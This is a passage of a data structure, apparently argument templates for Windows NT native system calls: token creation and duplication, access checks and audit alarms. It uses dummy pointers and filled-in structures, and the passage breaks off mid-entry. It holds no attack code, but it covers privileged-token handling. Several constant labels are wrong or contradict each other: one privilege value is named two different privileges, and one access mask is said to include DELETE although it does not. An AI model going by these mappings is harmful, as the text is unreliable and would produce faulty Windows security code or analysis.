"0xbadd00c0", "additionalComment": "Pointer to TOKEN_PRIMARY_GROUP (dummy pointer)", "structurePointer": "TOKEN_PRIMARY_GROUP", "structureRef": "struct237", "structureValueExpectations": "Primary group SID.", "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to TOKEN_OWNER (dummy pointer)", "structurePointer": "TOKEN_OWNER", "structureRef": "struct238", "structureValueExpectations": "Owner SID.", "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to TOKEN_PRIVILEGES (dummy pointer)", "structurePointer": "TOKEN_PRIVILEGES", "structureRef": "struct239", "structureValueExpectations": "Privileges for the token.", "pointedValue": None }, { "value": "0xbadd00f0", "additionalComment": "Pointer to TOKEN_GROUPS (dummy pointer)", "structurePointer": "TOKEN_GROUPS", "structureRef": "struct240", "structureValueExpectations": "Group SIDs for the token.", "pointedValue": None }, { "value": "0xbadd0100", "additionalComment": "Pointer to TOKEN_USER (dummy pointer)", "structurePointer": "TOKEN_USER", "structureRef": "struct241", "structureValueExpectations": "User SID.", "pointedValue": None }, { "value": "0xbadd0110", "additionalComment": "Pointer to LARGE_INTEGER ExpirationTime (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct242", "structureValueExpectations": "Token expiration time.", "pointedValue": None }, { "value": "0xbadd0120", "additionalComment": "Pointer to LUID AuthenticationId (dummy pointer)", "structurePointer": "LUID", "structureRef": "struct243", "structureValueExpectations": "Authentication identifier.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "TokenType (TokenPrimary)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0130", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct244", "structureValueExpectations": "Token object attributes.", "pointedValue": None }, { "value": "0x000F01FF", "additionalComment": "DesiredAccess (TOKEN_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0140", "additionalComment": "Pointer to HANDLE TokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct235": { "type": "TOKEN_SOURCE", "fields": [ { "fieldName": "SourceName", "fieldType": "CHAR[8]", "fieldValue": "0x4c6f676f6e616d65", "fieldComment": "'Logoname' (example)" }, { "fieldName": "SourceIdentifier.LowPart", "fieldType": "ULONG", "fieldValue": "0x12345678", "fieldComment": "Low part" }, { "fieldName": "SourceIdentifier.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part" } ] }, "struct236": { "type": "TOKEN_DEFAULT_DACL", "fields": [ { "fieldName": "DefaultDacl", "fieldType": "PACL", "fieldValue": "0xbadd0180", "fieldComment": "Pointer to ACL (dummy pointer)" } ] }, "struct237": { "type": "TOKEN_PRIMARY_GROUP", "fields": [ { "fieldName": "PrimaryGroup", "fieldType": "PSID", "fieldValue": "0xbadd0190", "fieldComment": "Pointer to SID (dummy pointer)" } ] }, "struct238": { "type": "TOKEN_OWNER", "fields": [ { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd01a0", "fieldComment": "Pointer to SID (dummy pointer)" } ] }, "struct239": { "type": "TOKEN_PRIVILEGES", "fields": [ { "fieldName": "PrivilegeCount", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Two privileges" }, { "fieldName": "Privileges[0].Luid.LowPart", "fieldType": "ULONG", "fieldValue": "0x00000017", "fieldComment": "SE_SHUTDOWN_PRIVILEGE" }, { "fieldName": "Privileges[0].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part" }, { "fieldName": "Privileges[0].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" }, { "fieldName": "Privileges[1].Luid.LowPart", "fieldType": "ULONG", "fieldValue": "0x00000012", "fieldComment": "SE_TCB_PRIVILEGE" }, { "fieldName": "Privileges[1].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part" }, { "fieldName": "Privileges[1].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" } ] }, "struct240": { "type": "TOKEN_GROUPS", "fields": [ { "fieldName": "GroupCount", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "One group" }, { "fieldName": "Groups[0].Sid", "fieldType": "PSID", "fieldValue": "0xbadd01b0", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Groups[0].Attributes", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "SE_GROUP_ENABLED" } ] }, "struct241": { "type": "TOKEN_USER", "fields": [ { "fieldName": "User.Sid", "fieldType": "PSID", "fieldValue": "0xbadd01c0", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "User.Attributes", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "SE_GROUP_ENABLED" } ] }, "struct242": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x7fffffffffffffff", "fieldComment": "Maximum expiration time" } ] }, "struct243": { "type": "LUID", "fields": [ { "fieldName": "LowPart", "fieldType": "ULONG", "fieldValue": "0x0000abcd", "fieldComment": "Low part of LUID" }, { "fieldName": "HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part of LUID" } ] }, "struct244": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtDuplicateToken": { "ntFunc": "NtDuplicateToken", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE NewTokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "TokenType = TokenPrimary", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "EffectiveOnly = TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct245", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F01FF", "additionalComment": "DesiredAccess = TOKEN_ALL_ACCESS", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ExistingTokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct245": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no object name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenProcessToken": { "ntFunc": "NtOpenProcessToken", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE TokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00020008", "additionalComment": "DesiredAccess = TOKEN_QUERY | TOKEN_DUPLICATE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtOpenThreadToken": { "ntFunc": "NtOpenThreadToken", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE TokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "OpenAsSelf = TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00020008", "additionalComment": "DesiredAccess = TOKEN_QUERY | TOKEN_DUPLICATE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryInformationToken": { "ntFunc": "NtQueryInformationToken", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000020", "additionalComment": "TokenInformationLength = 32 bytes", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to TokenInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "TokenInformationClass = TokenUser", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000666", "additionalComment": "HANDLE TokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationToken": { "ntFunc": "NtSetInformationToken", "pushes": [ { "value": "0x00000020", "additionalComment": "TokenInformationLength = 32 bytes", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to TokenInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000006", "additionalComment": "TokenInformationClass = TokenGroups", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000666", "additionalComment": "HANDLE TokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAccessCheckAndAuditAlarm": { "ntFunc": "NtAccessCheckAndAuditAlarm", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to BOOLEAN GenerateOnClose (dummy pointer, will receive TRUE/FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG AccessStatus (dummy pointer, will receive access status)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG GrantedAccess (dummy pointer, will receive granted access mask)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "ObjectCreation = FALSE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to GENERIC_MAPPING (dummy pointer)", "structurePointer": "GENERIC_MAPPING", "structureRef": "struct246", "structureValueExpectations": "GENERIC_READ/WRITE/EXECUTE/ALL mappings.", "pointedValue": None }, { "value": "0x00120089", "additionalComment": "DesiredAccess (SYNCHRONIZE | READ_CONTROL | DELETE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct247", "structureValueExpectations": "Owner, group, DACL, SACL fields.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to UNICODE_STRING ObjectName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct248", "structureValueExpectations": "Object name string.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct249", "structureValueExpectations": "Object type name string.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct250", "structureValueExpectations": "Subsystem name string.", "pointedValue": None } ], "structures": { "struct246": { "type": "GENERIC_MAPPING", "fields": [ { "fieldName": "GenericRead", "fieldType": "ACCESS_MASK", "fieldValue": "0x80000000", "fieldComment": "GENERIC_READ" }, { "fieldName": "GenericWrite", "fieldType": "ACCESS_MASK", "fieldValue": "0x40000000", "fieldComment": "GENERIC_WRITE" }, { "fieldName": "GenericExecute", "fieldType": "ACCESS_MASK", "fieldValue": "0x20000000", "fieldComment": "GENERIC_EXECUTE" }, { "fieldName": "GenericAll", "fieldType": "ACCESS_MASK", "fieldValue": "0x10000000", "fieldComment": "GENERIC_ALL" } ] }, "struct247": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "UCHAR", "fieldValue": "0x01", "fieldComment": "SECURITY_DESCRIPTOR_REVISION" }, { "fieldName": "Sbz1", "fieldType": "UCHAR", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "USHORT", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd0130", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PSID", "fieldValue": "0xbadd0140", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PACL", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PACL", "fieldValue": "0xbadd0150", "fieldComment": "Pointer to ACL (dummy pointer)" } ] }, "struct248": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "16 bytes (8 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0160", "fieldComment": "Pointer to object name string (dummy pointer)" } ] }, "struct249": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0012", "fieldComment": "18 bytes (9 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0170", "fieldComment": "Pointer to object type name string (dummy pointer)" } ] }, "struct250": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "20 bytes (10 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0180", "fieldComment": "Pointer to subsystem name string (dummy pointer)" } ] } } }, "NtCloseObjectAuditAlarm": { "ntFunc": "NtCloseObjectAuditAlarm", "pushes": [ { "value": "0x00000001", "additionalComment": "GenerateOnClose = TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct251", "structureValueExpectations": "Subsystem name string.", "pointedValue": None } ], "structures": { "struct251": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "20 bytes (10 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0190", "fieldComment": "Pointer to subsystem name string (dummy pointer)" } ] } } }, "NtDeleteObjectAuditAlarm": { "ntFunc": "NtDeleteObjectAuditAlarm", "pushes": [ { "value": "0x00000000", "additionalComment": "GenerateOnClose = FALSE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct252", "structureValueExpectations": "Subsystem name string.", "pointedValue": None } ], "structures": { "struct252": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "20 bytes (10 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd01a0", "fieldComment": "Pointer to subsystem name string (dummy pointer)" } ] } } }, "NtOpenObjectAuditAlarm": { "ntFunc": "NtOpenObjectAuditAlarm", "pushes": [ { "value": "0xbadd00a0", "additionalComment": "Pointer to BOOLEAN GenerateOnClose (dummy pointer, will receive TRUE/FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "AccessGranted = TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ObjectCreation = FALSE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to PRIVILEGE_SET (dummy pointer)", "structurePointer": "PRIVILEGE_SET", "structureRef": "struct253", "structureValueExpectations": "Privilege count and LUID_AND_ATTRIBUTES array.", "pointedValue": None }, { "value": "0x00120089", "additionalComment": "GrantedAccess (SYNCHRONIZE | READ_CONTROL | DELETE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00120089", "additionalComment": "DesiredAccess (SYNCHRONIZE | READ_CONTROL | DELETE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000445", "additionalComment": "HANDLE ClientToken (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00c0", "additionalComment": "Pointer to SECURITY_DESCRIPTOR (dummy pointer)", "structurePointer": "SECURITY_DESCRIPTOR", "structureRef": "struct254", "structureValueExpectations": "Owner, group, DACL, SACL fields.", "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to UNICODE_STRING ObjectName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct255", "structureValueExpectations": "Object name string.", "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to UNICODE_STRING ObjectTypeName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct256", "structureValueExpectations": "Object type name string.", "pointedValue": None }, { "value": "0xbadd00f0", "additionalComment": "Pointer to HANDLE ObjectHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0100", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct257", "structureValueExpectations": "Subsystem name string.", "pointedValue": None } ], "structures": { "struct253": { "type": "PRIVILEGE_SET", "fields": [ { "fieldName": "PrivilegeCount", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "One privilege" }, { "fieldName": "Control", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "PRIVILEGE_SET_ALL_NECESSARY" }, { "fieldName": "Privilege[0].Luid.LowPart", "fieldType": "DWORD", "fieldValue": "0x00000017", "fieldComment": "SE_TCB_PRIVILEGE (example)" }, { "fieldName": "Privilege[0].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part of LUID" }, { "fieldName": "Privilege[0].Attributes", "fieldType": "DWORD", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" } ] }, "struct254": { "type": "SECURITY_DESCRIPTOR", "fields": [ { "fieldName": "Revision", "fieldType": "UCHAR", "fieldValue": "0x01", "fieldComment": "SECURITY_DESCRIPTOR_REVISION" }, { "fieldName": "Sbz1", "fieldType": "UCHAR", "fieldValue": "0x00", "fieldComment": "Reserved" }, { "fieldName": "Control", "fieldType": "USHORT", "fieldValue": "0x8004", "fieldComment": "SE_DACL_PRESENT | SE_SELF_RELATIVE" }, { "fieldName": "Owner", "fieldType": "PSID", "fieldValue": "0xbadd01b0", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Group", "fieldType": "PSID", "fieldValue": "0xbadd01c0", "fieldComment": "Pointer to SID (dummy pointer)" }, { "fieldName": "Sacl", "fieldType": "PACL", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Dacl", "fieldType": "PACL", "fieldValue": "0xbadd01d0", "fieldComment": "Pointer to ACL (dummy pointer)" } ] }, "struct255": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "16 bytes (8 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd01e0", "fieldComment": "Pointer to object name string (dummy pointer)" } ] }, "struct256": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0012", "fieldComment": "18 bytes (9 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd01f0", "fieldComment": "Pointer to object type name string (dummy pointer)" } ] }, "struct257": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "20 bytes (10 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0200", "fieldComment": "Pointer to subsystem name string (dummy pointer)" } ] } } }, "NtPrivilegeObjectAuditAlarm": { "ntFunc": "NtPrivilegeObjectAuditAlarm", "pushes": [ { "value": "0x00000001", "additionalComment": "AccessGranted = TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0110", "additionalComment": "Pointer to PRIVILEGE_SET ClientPrivileges (dummy pointer)", "structurePointer": "PRIVILEGE_SET", "structureRef": "struct258", "structureValueExpectations": "Privilege count and LUID_AND_ATTRIBUTES array.", "pointedValue": None }, { "value": "0x00120089", "additionalComment": "DesiredAccess (SYNCHRONIZE | READ_CONTROL | DELETE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000445", "additionalComment": "HANDLE ClientToken (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0120", "additionalComment": "Pointer to UNICODE_STRING SubsystemName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct259", "structureValueExpectations": "Subsystem name string.", "pointedValue": None } ], "structures": { "struct258": { "type": "PRIVILEGE_SET", "fields": [ { "fieldName": "PrivilegeCount", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "One privilege" }, { "fieldName": "Control", "fieldType": "DWORD", "fieldValue": "0x00000001", "fieldComment": "PRIVILEGE_SET_ALL_NECESSARY" }, { "fieldName": "Privilege[0].Luid.LowPart", "fieldType": "DWORD", "fieldValue": "0x00000017", "fieldComment": "SE_TCB_PRIVILEGE (example)" }, { "fieldName": "Privilege[0].Luid.HighPart", "fieldType": "LONG", "fieldValue": "0x00000000", "fieldComment": "High part of LUID" }, { "fieldName": "Privilege[0].Attributes", "fieldType": "DWORD", "fieldValue": "0x00000002", "fieldComment": "SE_PRIVILEGE_ENABLED" } ] }, "struct259": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0014", "fieldComment": "20 bytes (10 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "32 bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0210", "fieldComment": "Pointer to subsystem name string (dummy pointer)" } ] } } }, "NtPrivilegedServiceAuditAlarm": { "ntFunc": "NtPrivilegedServiceAuditAlarm", "pushes": [ { "value": "0x00000000", "additionalComment": "AccessGranted = FALSE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ClientPrivileges = None (no privileges specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ClientToken = None (no client token)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ServiceName = None (no service name)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "SubsystemName = None (no subsystem name)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAccessCheck": { "ntFunc": "NtAccessCheck", "pushes": [ { "value": "0x00000000", "additionalComment": "AccessStatus = None (no status output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "GrantedAccess = None (no granted access output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BufferLength = None (no buffer length output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "RequiredPrivilegesBuffer = None (no privileges buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "GenericMapping = None (no generic mapping provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "DesiredAccess = 0x00000000 (no access requested)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ClientToken = None (no client token)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "SecurityDescriptor = None (no security descriptor)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAllocateLocallyUniqueId": { "ntFunc": "NtAllocateLocallyUniqueId", "pushes": [ { "value": "0x00000000", "additionalComment": "LocallyUniqueId = None (no output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAllocateUuids": { "ntFunc": "NtAllocateUuids", "pushes": [ { "value": "0x00000000", "additionalComment": "Sequence = None (no output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Range = None (no output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Time = None (no output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPrivilegeCheck": { "ntFunc": "NtPrivilegeCheck", "pushes": [ { "value": "0x00000000", "additionalComment": "Result = None (no output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "RequiredPrivileges = None (no privileges specified)", "structurePointer": None, "structureRef": None, 